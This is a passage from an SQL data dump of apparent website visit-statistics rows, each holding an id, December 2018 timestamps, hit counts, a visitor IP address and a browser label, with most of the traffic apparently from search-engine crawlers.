1439,1,1,0,0,'95.163.255.184','other'),(353093,1544971578,2,2,0,0,'46.211.133.70','chrome'),(353094,1544971649,2,2,0,0,'178.154.244.11','other'),(353095,1544971732,1,1,0,0,'54.36.148.143','other'),(353096,1544971760,1,1,0,0,'66.249.66.157','chrome'),(353097,1544971925,1,1,0,0,'54.36.149.41','other'),(353098,1544971978,51,51,0,0,'54.234.228.78','other'),(353099,1544972088,1,1,0,0,'5.45.207.79','other'),(353100,1544972444,1,1,0,0,'54.36.148.53','other'),(353101,1544972645,1,1,0,0,'54.36.148.34','other'),(353102,1544972840,1,1,0,0,'54.36.148.111','other'),(353103,1544972902,25,25,0,0,'54.234.228.78','other'),(353104,1544973218,2,2,0,0,'66.249.66.154','chrome'),(353105,1544973305,1,1,0,0,'54.36.148.72','other'),(353106,1544973393,1,1,0,0,'66.249.66.42','chrome'),(353107,1544973606,1,1,0,0,'95.163.255.98','other'),(353108,1544973646,1,1,0,0,'54.36.148.27','other'),(353109,1544973947,21,21,0,0,'54.234.228.78','other'),(353110,1544974054,1,1,0,0,'5.45.207.79','other'),(353111,1544974080,1,1,0,0,'87.250.224.65','other'),(353112,1544974084,1,1,0,0,'141.8.142.103','other'),(353113,1544974179,1,1,0,0,'54.36.148.204','other'),(353114,1544974204,1,1,0,0,'46.229.168.136','other'),(353115,1544974250,2,2,0,0,'95.108.213.4','other'),(353116,1544974279,1,1,0,0,'66.249.66.40','chrome'),(353117,1544974636,1,1,0,0,'54.36.149.27','other'),(353118,1544974733,1,1,0,0,'91.196.178.178','chrome'),(353119,1544974909,11,11,0,0,'54.234.228.78','other'),(353120,1544974976,1,1,0,0,'5.58.233.51','msie'),(353121,1544975073,1,1,0,0,'54.36.149.103','other'),(353122,1544975145,3,3,0,0,'141.8.142.103','other'),(353123,1544975182,3,3,0,0,'5.45.207.79','other'),(353124,1544975196,1,1,0,0,'95.108.213.4','other'),(353125,1544975308,1,1,0,0,'54.36.149.55','other'),(353126,1544975316,1,1,0,0,'46.229.168.148','other'),(353127,1544975674,1,1,0,0,'66.249.66.156','chrome'),(353128,1544975745,1,1,0,0,'54.36.148.104','other'),(353129,1544975761,1,1,0,0,'54.36.148.244','other'),(353130,1544975834,18,18,0,0,'54.234.228.78','other'),(353131,1544976061,1,1,0,0,'157.55.39.232','other'),(353132,1544976292,1,1,0,0,'54.36.149.31','other'),(353133,1544976588,1,1,0,0,'5.45.207.79','other'),(353134,1544976600,1,1,0,0,'66.249.66.157','chrome'),(353135,1544976601,1,1,0,0,'66.249.66.152','chrome'),(353136,1544976649,1,1,0,0,'178.154.244.11','other'),(353137,1544976787,20,20,0,0,'54.234.228.78','other'),(353138,1544977101,1,1,0,0,'54.36.149.72','other'),(353139,1544977489,1,1,0,0,'5.45.207.79','other'),(353140,1544977635,1,1,0,0,'54.36.149.51','other'),(353141,1544977659,1,1,0,0,'54.36.148.65','other'),(353142,1544977669,1,1,0,0,'66.249.66.156','chrome'),(353143,1544977717,2,2,0,0,'66.249.66.154','chrome'),(353145,1544977770,31,31,0,0,'54.234.228.78','other'),(353146,1544978205,1,1,0,0,'178.154.244.11','other'),(353147,1544978267,1,1,0,0,'54.165.59.7','other'),(353148,1544978330,1,1,0,0,'54.36.148.132','other'),(353149,1544978387,1,1,0,0,'5.45.207.19','other'),(353150,1544978434,1,1,0,0,'180.76.15.8','other'),(353151,1544979016,1,1,0,0,'54.36.149.16','other'),(353152,1544979225,2,2,0,0,'8.29.198.25','other'),(353153,1544979254,1,1,0,0,'66.249.66.154','chrome'),(353154,1544979309,1,1,0,0,'54.36.149.72','other'),(353155,1544979311,1,1,0,0,'66.249.66.155','chrome'),(353156,1544979362,1,1,0,0,'46.229.168.154','other'),(353157,1544979446,1,1,0,0,'95.163.255.99','other'),(353158,1544979448,1,1,0,0,'95.163.255.92','other'),(353159,1544979786,1,1,0,0,'46.229.168.140','other'),(353160,1544979950,1,1,0,0,'54.36.148.232','other'),(353161,1544980137,1,1,0,0,'54.36.149.84','other'),(353162,1544980384,40,40,0,0,'3.80.85.76','other'),(353163,1544980435,1,1,0,0,'180.76.15.34','other'),(353164,1544980436,1,1,0,0,'180.76.15.25','other'),(353165,1544980776,1,1,0,0,'5.58.233.51','other'),(353166,1544980782,1,1,0,0,'66.249.66.157','chrome'),(353167,1544980807,1,1,0,0,'66.249.66.154','chrome'),(353168,1544980953,1,1,0,0,'54.36.149.11','other'),(353169,1544981088,1,1,0,0,'54.36.148.93','other'),(353170,1544981197,1,1,0,0,'54.36.148.129','other'),(353171,1544981221,1,1,0,0,'54.36.149.76','other'),(353172,1544981286,14,14,0,0,'3.80.85.76','other'),(353173,1544981317,1,1,0,0,'46.229.168.146','other'),(353174,1544981355,1,1,0,0,'54.36.148.68','other'),(353175,1544981356,1,1,0,0,'5.45.207.79','other'),(353176,1544981357,1,1,0,0,'66.249.66.152','chrome'),(353177,1544981729,1,1,0,0,'54.36.148.74','other'),(353178,1544982162,2,2,0,0,'66.249.66.156','chrome'),(353179,1544982180,1,1,0,0,'54.36.148.248','other'),(353180,1544982326,2,2,0,0,'95.108.213.4','other'),(353181,1544982352,28,28,0,0,'3.80.85.76','other'),(353182,1544982398,1,1,0,0,'54.36.148.67','other'),(353183,1544982417,1,1,0,0,'176.120.100.231','msie'),(353184,1544982447,1,1,0,0,'5.45.207.19','other'),(353185,1544982841,2,2,0,0,'141.8.142.103','other'),(353186,1544982933,1,1,0,0,'66.249.66.152','chrome'),(353187,1544983028,2,2,0,0,'157.55.39.136','other'),(353188,1544983044,1,1,0,0,'46.229.168.135','other'),(353189,1544983114,1,1,0,0,'66.249.66.155','chrome'),(353191,1544983118,2,2,0,0,'66.249.66.156','chrome'),(353192,1544983180,1,1,0,0,'178.154.244.11','other'),(353193,1544983341,14,14,0,0,'3.80.85.76','other'),(353194,1544983677,1,1,0,0,'46.229.168.152','other'),(353195,1544983854,1,1,0,0,'54.36.148.85','other'),(353196,1544983868,2,2,0,0,'195.245.221.5','other'),(353197,1544983883,1,1,0,0,'52.162.211.179','msie'),(353198,1544984035,1,1,0,0,'207.46.13.20','other'),(353199,1544984200,2,2,0,0,'91.242.193.185','chrome'),(353200,1544984283,20,20,0,0,'3.80.85.76','other'),(353201,1544984466,1,1,0,0,'141.8.142.103','other'),(353202,1544984515,3,3,0,0,'95.163.255.92','other'),(353203,1544984566,1,1,0,0,'54.36.149.100','other'),(353204,1544984617,1,1,0,0,'5.45.207.79','other'),(353205,1544984772,2,2,0,0,'66.249.66.154','chrome'),(353206,1544984833,1,1,0,0,'178.154.244.11','other'),(353207,1544984962,1,1,0,0,'54.36.148.78','other'),(353208,1544984976,2,2,0,0,'157.55.39.232','other'),(353209,1544985026,1,1,0,0,'95.163.255.96','other'),(353210,1544985046,1,1,0,0,'66.249.66.156','chrome'),(353211,1544985330,1,1,0,0,'54.36.148.144','other'),(353212,1544985358,1,1,0,0,'54.36.148.241','other'),(353213,1544985387,1,1,0,0,'54.36.148.184','other'),(353214,1544985429,14,14,0,0,'3.80.85.76','other'),(353215,1544985434,1,1,0,0,'66.249.66.44','chrome'),(353216,1544985464,2,2,0,0,'46.211.121.44','chrome'),(353217,1544985548,2,2,0,0,'207.46.13.82','other'),(353218,1544985625,2,2,0,0,'176.36.3.169','firefox'),(353219,1544985952,1,1,0,0,'54.36.149.10','other'),(353220,1544986095,2,2,0,0,'95.163.255.62','other'),(353221,1544986098,1,1,0,0,'95.163.255.65','other'),(353222,1544986147,1,1,0,0,'54.36.148.125','other'),(353223,1544986244,1,1,0,0,'66.249.66.156','chrome'),(353224,1544986246,3,3,0,0,'66.249.66.154','chrome'),(353225,1544986421,1,1,0,0,'95.163.255.63','other'),(353226,1544986449,1,1,0,0,'66.249.66.157','chrome'),(353227,1544986450,1,1,0,0,'54.36.148.239','other'),(353228,1544986895,2,2,0,0,'66.249.66.152','chrome'),(353229,1544987180,1,1,0,0,'54.36.148.96','other'),(353230,1544987647,1,1,0,0,'54.36.149.19','other'),(353231,1544988111,1,1,0,0,'54.36.148.208','other'),(353232,1544988242,1,1,0,0,'40.77.167.113','other'),(353233,1544988276,1,1,0,0,'66.249.66.156','chrome'),(353234,1544988307,1,1,0,0,'66.249.66.42','chrome'),(353235,1544988463,2,2,0,0,'66.249.66.154','chrome'),(353236,1544988533,1,1,0,0,'46.229.168.136','other'),(353237,1544988550,1,1,0,0,'66.249.66.40','chrome'),(353238,1544988557,1,1,0,0,'54.36.148.166','other'),(353239,1544988576,1,1,0,0,'66.249.66.152','chrome'),(353240,1544988720,1,1,0,0,'37.53.57.109','chrome'),(353241,1544988736,1,1,0,0,'54.36.148.154','other'),(353242,1544988858,1,1,0,0,'66.249.66.57','chrome'),(353243,1544988860,1,1,0,0,'66.249.66.44','chrome'),(353244,1544988948,1,1,0,0,'54.36.148.61','other'),(353245,1544988969,1,1,0,0,'66.249.66.61','chrome'),(353246,1544988971,1,1,0,0,'54.36.148.141','other'),(353247,1544989040,2,2,0,0,'46.229.168.141','other'),(353248,1544989042,1,1,0,0,'46.229.168.145','other'),(353249,1544989059,1,1,0,0,'54.36.148.68','other'),(353250,1544989233,1,1,0,0,'46.229.168.130','other'),(353251,1544989235,1,1,0,0,'46.229.168.142','other'),(353252,1544989360,1,1,0,0,'66.249.66.156','chrome'),(353253,1544989594,1,1,0,0,'66.249.66.40','chrome'),(353254,1544989665,2,2,0,0,'46.229.168.129','other'),(353255,1544989762,1,1,0,0,'54.36.148.149','other'),(353256,1544989796,1,1,0,0,'66.249.66.154','chrome'),(353257,1544989830,2,2,0,0,'157.55.39.232','other'),(353258,1544989981,1,1,0,0,'54.36.149.107','other'),(353259,1544990067,2,2,0,0,'8.29.198.27','other'),(353260,1544990104,1,1,0,0,'54.36.149.3','other'),(353261,1544990189,1,1,0,0,'54.36.148.12','other'),(353262,1544990355,1,1,0,0,'46.229.168.148','other'),(353263,1544990414,1,1,0,0,'54.36.148.230','other'),(353264,1544990468,3,3,0,0,'5.45.207.79','other'),(353265,1544990475,1,1,0,0,'46.211.127.150','other'),(353266,1544990556,4,4,0,0,'178.154.244.11','other'),(353267,1544990560,1,1,0,0,'95.108.213.4','other'),(353268,1544990633,2,2,0,0,'5.45.207.19','other'),(353269,1544990738,1,1,0,0,'5.58.93.101','firefox'),(353270,1544990916,1,1,0,0,'95.163.255.97','other'),(353271,1544991036,2,2,0,0,'66.249.66.152','chrome'),(353272,1544991093,2,2,0,0,'66.249.66.154','chrome'),(353273,1544991512,1,1,0,0,'54.36.148.161','other'),(353274,1544991586,1,1,0,0,'46.229.168.133','other'),(353275,1544991669,1,1,0,0,'54.36.149.70','other'),(353276,1544991682,2,2,0,0,'5.45.207.19','other'),(353277,1544991713,1,1,0,0,'54.36.149.46','other'),(353278,1544991781,1,1,0,0,'178.154.244.11','other'),(353279,1544991873,1,1,0,0,'54.36.148.158','other'),(353280,1544992173,1,1,0,0,'54.36.149.13','other'),(353281,1544992733,1,1,0,0,'66.249.66.155','chrome'),(353282,1544992829,1,1,0,0,'54.36.149.39','other'),(353283,1544992965,2,2,0,0,'66.249.66.152','chrome'),(353284,1544993536,1,1,0,0,'5.45.207.19','other'),(353285,1544993688,1,1,0,0,'54.36.148.153','other'),(353286,1544993798,1,1,0,0,'5.45.207.79','other'),(353287,1544993835,1,1,0,0,'188.191.239.2','chrome'),(353288,1544993837,1,1,0,0,'95.163.255.92','other'),(353289,1544993946,1,1,0,0,'54.36.148.82','other'),(353290,1544994211,2,2,0,0,'66.249.66.152','chrome'),(353291,1544994385,2,2,0,0,'66.249.66.154','chrome'),(353292,1544994469,1,1,0,0,'54.36.148.87','other'),(353293,1544994800,1,1,0,0,'66.249.66.156','chrome'),(353294,1544994960,2,2,0,0,'157.55.39.232','other'),(353295,1544995324,1,1,0,0,'46.229.168.145','other'),(353296,1544995581,1,1,0,0,'66.249.66.154','chrome'),(353297,1544995586,2,2,0,0,'66.249.66.155','chrome'),(353298,1544995590,1,1,0,0,'66.249.66.152','chrome'),(353299,1544995761,1,1,0,0,'207.46.13.59','other'),(353300,1544996059,1,1,0,0,'66.249.66.156','chrome'),(353301,1544996067,1,1,0,0,'54.36.149.42','other'),(353302,1544996183,1,1,0,0,'46.229.168.148','other'),(353303,1544996401,1,1,0,0,'54.36.148.148','other'),(353304,1544996604,1,1,0,0,'95.163.255.93','other'),(353305,1544996727,1,1,0,0,'157.55.39.232','other'),(353306,1544996982,1,1,0,0,'141.8.142.103','other'),(353307,1544997002,1,1,0,0,'66.249.66.40','chrome'),(353308,1544997007,1,1,0,0,'54.36.148.116','other'),(353309,1544997113,1,1,0,0,'54.36.148.187','other'),(353310,1544997164,2,2,0,0,'66.249.66.156','chrome'),(353311,1544997593,1,1,0,0,'54.36.148.29','other'),(353312,1544997787,1,1,0,0,'46.229.168.141','other'),(353313,1544997907,2,2,0,0,'66.249.66.44','chrome'),(353314,1544997939,1,1,0,0,'54.36.148.85','other'),(353315,1544998012,1,1,0,0,'54.36.148.69','other'),(353316,1544998293,1,1,0,0,'66.249.66.156','chrome'),(353317,1544998294,2,2,0,0,'66.249.66.154','chrome'),(353318,1544998499,2,2,0,0,'66.249.66.155','chrome'),(353319,1544998500,4,4,0,0,'66.249.66.152','chrome'),(353320,1544998732,1,1,0,0,'66.249.66.59','chrome'),(353321,1544998829,1,1,0,0,'66.249.66.42','chrome'),(353322,1544998977,1,1,0,0,'54.36.148.114','other'),(353323,1544999137,1,1,0,0,'178.165.7.142','firefox'),(353324,1544999163,1,1,0,0,'66.249.66.157','chrome'),(353325,1544999324,1,1,0,0,'54.36.149.70','other'),(353326,1544999421,1,1,0,0,'54.36.148.163','other'),(353327,1544999494,1,1,0,0,'95.163.255.92','other'),(353328,1544999579,1,1,0,0,'66.249.66.156','chrome'),(353329,1544999663,1,1,0,0,'157.55.39.241','other'),(353330,1544999753,1,1,0,0,'54.36.148.147','other'),(353331,1544999855,1,1,0,0,'18.184.52.215','other'),(353332,1544999938,1,1,0,0,'66.249.66.40','chrome'),(353333,1545000189,1,1,0,0,'54.36.148.80','other'),(353334,1545000270,2,2,0,0,'91.209.11.236','other'),(353335,1545000304,1,1,0,0,'5.45.207.79','other'),(353336,1545000557,1,1,0,0,'66.249.66.152','chrome'),(353337,1545000560,1,1,0,0,'5.45.207.19','other'),(353338,1545000575,1,1,0,0,'66.249.66.44','chrome'),(353339,1545000670,1,1,0,0,'54.36.149.50','other'),(353340,1545000756,1,1,0,0,'54.36.148.243','other'),(353341,1545000896,1,1,0,0,'54.36.148.116','other'),(353342,1545000898,1,1,0,0,'8.29.198.25','other'),(353343,1545001168,1,1,0,0,'66.249.66.40','chrome'),(353344,1545001186,2,2,0,0,'66.249.66.154','chrome'),(353345,1545001255,1,1,0,0,'8.29.198.26','other'),(353346,1545001525,2,2,0,0,'66.249.66.42','chrome'),(353347,1545001594,1,1,0,0,'66.249.66.44','chrome'),(353348,1545001710,1,1,0,0,'54.36.149.89','other'),(353349,1545001841,1,1,0,0,'95.163.255.93','other'),(353350,1545001844,1,1,0,0,'95.163.255.97','other'),(353351,1545001847,1,1,0,0,'66.249.66.61','chrome'),(353352,1545001850,1,1,0,0,'178.154.244.11','other'),(353353,1545002413,4,4,0,0,'66.249.66.152','chrome'),(353354,1545002463,1,1,0,0,'54.36.148.214','other'),(353355,1545002466,1,1,0,0,'66.249.66.156','chrome'),(353356,1545002734,2,2,0,0,'54.36.148.161','other'),(353357,1545002845,2,2,0,0,'66.249.66.154','chrome'),(353358,1545002949,1,1,0,0,'54.36.149.17','other'),(353359,1545003327,1,1,0,0,'54.36.148.98','other'),(353360,1545003334,1,1,0,0,'46.229.168.148','other'),(353361,1545003344,1,1,0,0,'46.229.168.136','other'),(353362,1545003569,1,1,0,0,'54.36.149.106','other'),(353363,1545003581,1,1,0,0,'54.36.148.141','other'),(353364,1545003589,1,1,0,0,'54.36.148.242','other'),(353365,1545003696,1,1,0,0,'54.36.149.72','other'),(353366,1545003963,1,1,0,0,'54.36.149.16','other'),(353367,1545004232,1,1,0,0,'157.55.39.213','other'),(353368,1545004390,2,2,0,0,'66.249.66.42','chrome'),(353369,1545004666,3,3,0,0,'66.249.66.154','chrome'),(353370,1545004857,1,1,0,0,'54.36.148.50','other'),(353371,1545004920,1,1,0,0,'66.249.66.152','chrome'),(353372,1545005407,2,2,0,0,'157.55.39.152','other'),(353373,1545005487,1,1,0,0,'95.163.255.186','other'),(353374,1545005560,1,1,0,0,'54.36.148.30','other'),(353375,1545005874,1,1,0,0,'54.36.148.250','other'),(353376,1545006270,1,1,0,0,'54.36.148.134','other'),(353377,1545006277,4,4,0,0,'66.249.66.156','chrome'),(353378,1545006840,1,1,0,0,'54.36.148.88','other'),(353379,1545007033,1,1,0,0,'66.249.66.152','chrome'),(353380,1545007498,1,1,0,0,'54.36.148.214','other'),(353381,1545007506,1,1,0,0,'54.36.148.33','other'),(353382,1545007791,1,1,0,0,'54.36.148.128','other'),(353383,1545007885,1,1,0,0,'46.229.168.130','other'),(353384,1545008045,1,1,0,0,'95.163.255.94','other'),(353385,1545008114,1,1,0,0,'54.36.149.44','other'),(353386,1545008128,1,1,0,0,'185.107.47.171','other'),(353387,1545008171,1,1,0,0,'66.249.66.157','chrome'),(353388,1545008172,1,1,0,0,'66.249.66.154','chrome'),(353389,1545008436,1,1,0,0,'54.36.149.94','other'),(353390,1545008442,4,4,0,0,'66.249.66.152','chrome'),(353391,1545008656,1,1,0,0,'66.249.66.156','chrome'),(353392,1545008747,2,2,0,0,'66.249.66.44','chrome'),(353393,1545009017,1,1,0,0,'54.36.148.241','other'),(353394,1545009029,1,1,0,0,'54.36.148.107','other'),(353395,1545009722,1,1,0,0,'66.249.66.156','chrome'),(353396,1545009879,1,1,0,0,'54.36.149.55','other'),(353397,1545009886,1,1,0,0,'66.249.66.44','chrome'),(353398,1545010015,2,2,0,0,'66.249.66.154','chrome'),(353399,1545010030,1,1,0,0,'54.36.148.165','other'),(353400,1545010645,1,1,0,0,'157.55.39.213','other'),(353401,1545010720,2,2,0,0,'95.163.255.99','other'),(353402,1545010976,1,1,0,0,'66.249.66.154','chrome'),(353403,1545010994,1,1,0,0,'54.36.148.199','other'),(353404,1545011055,1,1,0,0,'54.36.148.150','other'),(353405,1545011147,1,1,0,0,'54.36.149.82','other'),(353406,1545011283,1,1,0,0,'157.55.39.241','other'),(353407,1545011360,2,2,0,0,'95.163.255.115','other'),(353408,1545011369,1,1,0,0,'46.229.168.149','other'),(353409,1545011736,1,1,0,0,'8.29.198.25','other'),(353410,1545011890,1,1,0,0,'37.9.113.103','other'),(353411,1545012021,1,1,0,0,'54.36.149.3','other'),(353412,1545012036,1,1,0,0,'5.45.207.79','other'),(353413,1545012098,1,1,0,0,'8.29.198.26','other'),(353414,1545012232,1,1,0,0,'5.45.207.19','other'),(353415,1545012376,1,1,0,0,'95.163.255.115','other'),(353416,1545012524,1,1,0,0,'91.196.178.40','chrome'),(353417,1545012548,1,1,0,0,'95.108.213.4','other'),(353418,1545012559,1,1,0,0,'141.8.142.103','other'),(353419,1545012592,1,1,0,0,'46.229.168.145','other'),(353420,1545012621,1,1,0,0,'87.250.224.65','other'),(353421,1545012940,1,1,0,0,'37.9.113.20','other'),(353422,1545013086,1,1,0,0,'178.154.244.11','other'),(353423,1545013309,2,2,0,0,'5.45.207.79','other'),(353424,1545013386,1,1,0,0,'66.249.66.155','chrome'),(353425,1545013387,3,3,0,0,'66.249.66.154','chrome'),(353426,1545013417,1,1,0,0,'54.36.149.49','other'),(353427,1545013545,4,4,0,0,'66.249.66.156','chrome'),(353428,1545013579,1,1,0,0,'95.163.255.105','other'),(353429,1545013997,1,1,0,0,'178.154.244.11','other'),(353430,1545014183,1,1,0,0,'54.36.149.42','other'),(353431,1545014429,1,1,0,0,'66.249.66.154','chrome'),(353432,1545014630,1,1,0,0,'95.163.255.116','other'),(353433,1545014716,1,1,0,0,'54.36.149.74','other'),(353434,1545014776,1,1,0,0,'46.229.168.148','other'),(353435,1545014840,1,1,0,0,'157.55.39.213','other'),(353436,1545014917,2,2,0,0,'66.249.66.152','chrome'),(353437,1545014975,1,1,0,0,'157.55.39.241','other'),(353438,1545015238,1,1,0,0,'54.36.148.129','other'),(353439,1545015360,2,2,0,0,'95.163.255.118','other'),(353440,1545015377,1,1,0,0,'66.249.66.156','chrome'),(353441,1545015782,1,1,0,0,'157.55.39.213','other'),(353442,1545015837,1,1,0,0,'54.36.148.67','other'),(353443,1545016073,1,1,0,0,'54.36.148.167','other'),(353444,1545016317,1,1,0,0,'46.229.168.148','other'),(353445,1545016448,1,1,0,0,'54.36.149.76','other'),(353446,1545016472,1,1,0,0,'95.163.255.104','other'),(353447,1545016725,1,1,0,0,'46.229.168.146','other'),(353448,1545016795,1,1,0,0,'66.249.66.152','chrome'),(353449,1545016863,1,1,0,0,'95.163.255.106','other'),(353450,1545016888,1,1,0,0,'95.163.255.152','other'),(353451,1545017183,1,1,0,0,'66.249.66.40','chrome'),(353452,1545017259,1,1,0,0,'54.36.148.231','other'),(353453,1545017308,1,1,0,0,'95.24.2.225','firefox'),(353454,1545017331,1,1,0,0,'54.36.148.126','other'),(353455,1545017629,1,1,0,0,'54.36.149.1','other'),(353456,1545017747,1,1,0,0,'46.229.168.130','other'),(353457,1545017751,1,1,0,0,'66.249.66.157','chrome'),(353458,1545017768,1,1,0,0,'66.249.66.156','chrome'),(353459,1545017834,1,1,0,0,'54.36.148.185','other'),(353460,1545018214,1,1,0,0,'54.36.148.48','other'),(353461,1545018411,2,2,0,0,'66.249.66.154','chrome'),(353462,1545018467,1,1,0,0,'46.229.168.144','other'),(353463,1545018762,1,1,0,0,'54.36.148.246','other'),(353464,1545018976,1,1,0,0,'54.36.148.160','other'),(353465,1545019147,2,2,0,0,'66.249.66.156','chrome'),(353466,1545019294,1,1,0,0,'46.229.168.138','other'),(353467,1545019444,1,1,0,0,'95.163.255.96','other'),(353468,1545019455,1,1,0,0,'95.163.255.93','other'),(353469,1545019465,1,1,0,0,'40.77.167.25','other'),(353470,1545019500,2,2,0,0,'157.55.39.152','other'),(353471,1545019704,1,1,0,0,'95.163.255.174','other'),(353472,1545019781,2,2,0,0,'66.249.66.154','chrome'),(353473,1545020122,1,1,0,0,'54.36.148.159','other'),(353474,1545020238,3,3,0,0,'66.249.66.152','chrome'),(353475,1545020389,3,3,0,0,'66.249.66.156','chrome'),(353476,1545020584,1,1,0,0,'54.36.148.129','other'),(353477,1545020728,1,1,0,0,'66.249.66.44','chrome'),(353478,1545020729,1,1,0,0,'54.36.148.244','other'),(353479,1545020743,1,1,0,0,'54.36.149.42','other'),(353480,1545020764,2,2,0,0,'66.249.66.155','chrome'),(353481,1545020906,1,1,0,0,'54.36.148.174','other'),(353482,1545021207,1,1,0,0,'46.229.168.154','other'),(353483,1545021356,2,2,0,0,'66.249.66.154','chrome'),(353484,1545021374,1,1,0,0,'157.55.39.241','other'),(353485,1545021986,2,2,0,0,'66.249.66.156','chrome'),(353486,1545022025,1,1,0,0,'95.163.255.94','other'),(353487,1545022028,1,1,0,0,'95.163.255.98','other'),(353488,1545022088,1,1,0,0,'54.36.149.36','other'),(353489,1545022219,57,57,0,0,'52.168.120.194','other'),(353490,1545022278,1,1,0,0,'66.249.66.155','chrome'),(353492,1545022398,1,1,0,0,'54.36.148.161','other'),(353493,1545022410,4,4,0,0,'66.249.66.152','chrome'),(353494,1545022434,36,36,0,0,'207.180.226.173','other'),(353495,1545022468,1,1,0,0,'66.249.66.154','chrome'),(353496,1545022559,107,107,0,0,'148.251.247.241','other'),(353497,1545022573,1,1,0,0,'8.29.198.26','other'),(353498,1545022737,1,1,0,0,'66.249.66.42','chrome'),(353499,1545022780,2,2,0,0,'178.154.244.11','other'),(353500,1545022784,2,2,0,0,'5.45.207.79','other'),(353501,1545022927,1,1,0,0,'8.29.198.27','other'),(353502,1545022944,1,1,0,0,'54.36.149.80','other'),(353503,1545023008,1,1,0,0,'66.249.66.44','chrome'),(353504,1545023024,2,2,0,0,'46.229.168.129','other'),(353505,1545023372,1,1,0,0,'40.77.167.25','other'),(353506,1545023691,1,1,0,0,'5.45.207.79','other'),(353507,1545023718,2,2,0,0,'178.154.244.11','other'),(353508,1545023748,3,3,0,0,'5.45.207.19','other'),(353509,1545023950,1,1,0,0,'54.36.148.249','other'),(353510,1545023965,1,1,0,0,'54.36.148.145','other'),(353511,1545023986,1,1,0,0,'54.36.148.19','other'),(353512,1545024010,1,1,0,0,'66.249.66.154','chrome'),(353513,1545024012,3,3,0,0,'66.249.66.156','chrome'),(353514,1545024023,1,1,0,0,'46.229.168.148','other'),(353515,1545024025,2,2,0,0,'46.229.168.134','other'),(353516,1545024041,1,1,0,0,'66.249.66.59','chrome'),(353518,1545024145,1,1,0,0,'54.36.148.126','other'),(353519,1545024160,1,1,0,0,'157.55.39.213','other'),(353520,1545024505,1,1,0,0,'87.250.224.65','other'),(353521,1545024652,1,1,0,0,'141.8.142.103','other'),(353522,1545024669,1,1,0,0,'40.77.167.25','other'),(353523,1545024771,1,1,0,0,'95.108.181.57','other'),(353524,1545024845,1,1,0,0,'66.249.66.157','chrome'),(353525,1545024858,1,1,0,0,'5.45.207.79','other'),(353526,1545024944,1,1,0,0,'66.249.66.156','chrome'),(353527,1545025032,2,2,0,0,'95.163.255.93','other'),(353528,1545025036,3,3,0,0,'95.163.255.95','other'),(353529,1545025149,1,1,0,0,'95.163.255.94','other'),(353530,1545025340,1,1,0,0,'66.249.66.152','chrome'),(353531,1545025351,1,1,0,0,'54.36.148.146','other'),(353532,1545025433,1,1,0,0,'95.163.255.96','other'),(353533,1545025437,1,1,0,0,'95.163.255.99','other'),(353534,1545025571,1,1,0,0,'54.36.148.210','other'),(353535,1545025609,1,1,0,0,'180.76.15.18','other'),(353536,1545025611,1,1,0,0,'180.76.15.158','other'),(353537,1545025828,1,1,0,0,'54.36.149.96','other'),(353538,1545025843,1,1,0,0,'46.229.168.152','other'),(353539,1545025923,1,1,0,0,'157.55.39.59','other'),(353540,1545025997,1,1,0,0,'95.163.255.192','other'),(353541,1545026002,2,2,0,0,'95.163.255.159','other'),(353542,1545026063,1,1,0,0,'54.36.148.48','other'),(353543,1545026145,2,2,0,0,'40.77.167.176','other'),(353544,1545026297,1,1,0,0,'46.229.168.144','other'),(353545,1545026549,1,1,0,0,'95.163.255.158','other'),(353546,1545026688,1,1,0,0,'46.229.168.147','other'),(353547,1545026695,1,1,0,0,'157.55.39.213','other'),(353548,1545026953,1,1,0,0,'40.77.167.25','other'),(353549,1545026964,1,1,0,0,'95.163.255.186','other'),(353550,1545027003,1,1,0,0,'95.163.255.173','other'),(353551,1545027273,1,1,0,0,'54.36.148.186','other'),(353552,1545027593,1,1,0,0,'66.249.66.156','chrome'),(353553,1545027594,1,1,0,0,'66.249.66.152','chrome'),(353554,1545027673,1,1,0,0,'95.163.255.98','other'),(353555,1545027676,1,1,0,0,'95.163.255.99','other'),(353556,1545027683,1,1,0,0,'5.188.210.53','chrome'),(353557,1545028106,1,1,0,0,'54.36.148.213','other'),(353558,1545028202,1,1,0,0,'178.154.244.11','other'),(353559,1545028247,1,1,0,0,'92.244.99.158','chrome'),(353560,1545028549,1,1,0,0,'66.249.66.154','chrome'),(353561,1545028636,2,2,0,0,'199.58.86.209','other'),(353562,1545028672,1,1,0,0,'95.163.255.185','other'),(353563,1545028681,1,1,0,0,'95.163.255.160','other'),(353564,1545028710,3,3,0,0,'66.249.66.152','chrome'),(353565,1545029249,1,1,0,0,'46.229.168.139','other'),(353566,1545029312,2,2,0,0,'66.249.66.157','chrome'),(353567,1545029355,2,2,0,0,'66.249.66.156','chrome'),(353568,1545029452,1,1,0,0,'54.165.59.7','other'),(353569,1545029530,1,1,0,0,'178.154.244.11','other'),(353570,1545029568,1,1,0,0,'54.36.148.233','other'),(353571,1545029717,2,2,0,0,'5.45.207.79','other'),(353572,1545029763,1,1,0,0,'54.36.149.42','other'),(353573,1545029791,1,1,0,0,'46.229.168.153','other'),(353574,1545029816,1,1,0,0,'46.229.168.151','other'),(353575,1545029848,1,1,0,0,'54.36.149.16','other'),(353576,1545029938,1,1,0,0,'66.249.66.222','chrome'),(353577,1545030250,1,1,0,0,'95.163.255.186','other'),(353578,1545030258,1,1,0,0,'95.163.255.159','other'),(353579,1545030288,1,1,0,0,'66.249.66.157','chrome'),(353580,1545030289,2,2,0,0,'66.249.66.152','chrome'),(353581,1545030392,1,1,0,0,'54.36.149.4','other'),(353582,1545030495,1,1,0,0,'54.36.148.73','other'),(353583,1545030662,1,1,0,0,'46.229.168.137','other'),(353584,1545030723,1,1,0,0,'207.46.13.82','other'),(353585,1545030924,1,1,0,0,'54.36.148.39','other'),(353586,1545030977,1,1,0,0,'40.77.167.176','other'),(353587,1545031408,1,1,0,0,'178.154.244.11','other'),(353588,1545031524,3,3,0,0,'66.249.66.156','chrome'),(353589,1545031617,1,1,0,0,'54.36.148.29','other'),(353590,1545031672,1,1,0,0,'54.36.148.204','other'),(353591,1545031867,1,1,0,0,'46.229.168.153','other'),(353592,1545031868,1,1,0,0,'46.229.168.146','other'),(353593,1545031915,2,2,0,0,'66.249.66.154','chrome'),(353594,1545031955,4,4,0,0,'94.100.221.234','chrome'),(353595,1545031977,1,1,0,0,'54.36.149.40','other'),(353596,1545032046,1,1,0,0,'95.163.255.109','other'),(353597,1545032115,1,1,0,0,'46.229.168.148','other'),(353598,1545032225,1,1,0,0,'95.163.255.176','other'),(353599,1545032238,1,1,0,0,'95.163.255.170','other'),(353600,1545032318,1,1,0,0,'54.36.148.154','other'),(353601,1545032326,1,1,0,0,'91.196.178.67','chrome'),(353602,1545032443,1,1,0,0,'95.163.255.115','other'),(353603,1545032548,1,1,0,0,'54.36.